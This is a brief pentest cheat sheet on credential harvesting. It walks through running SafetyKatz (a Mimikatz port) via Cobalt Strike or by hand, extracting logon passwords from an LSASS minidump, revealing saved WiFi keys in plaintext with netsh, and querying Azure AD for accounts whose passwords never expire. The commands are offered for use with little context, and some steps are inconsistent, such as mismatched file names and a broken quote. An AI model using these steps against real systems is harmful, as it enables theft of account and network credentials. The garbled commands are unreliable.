Crerdentials

MimiKatz Alternatives:

Syntax:  {variable-placeholder}

without -c {cmd} returns a cmd shell 

SafetyKatz (https://github.com/GhostPack/SafetyKatz):

  • C# instantiation of Mimikatz

Via Cobalt Strike Beacon:

  • Compile with VS Community (if not already done)

  • From Beacon:  execute-assembly SafetyKatz.exe

Manual Method:

  • Copy SafetyKatz.exe to host

  • Execute SafetyKatz.exe

  • download C:\WINDOWS\Temp\debug808.bin

  • copy to creds folder...

  • mv debug808.bin debug808.gz

  • gzip -d debug.gz

  • sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full

Harvest Plain-Text WiFI Creds from Windows:

  • Open an admin command prompt

  • netsh wlan show profile  * lists all wireless profiles

  • netsh wlan show profile name="tgt-profiles" key=clear
    * Reveals the PSK

Azure-AD:

 
Search for User Password Never Expires

  • Get-AzureADUser -All $true | Select-Object UserPrincipalName, @{N="PasswordNeverExpires";E={$_.PasswordPolicies -contains "DisablePasswordExpiration"}}

Placeholder - more to come!:

 

Pentest-Zen (ExitC0de00c.com)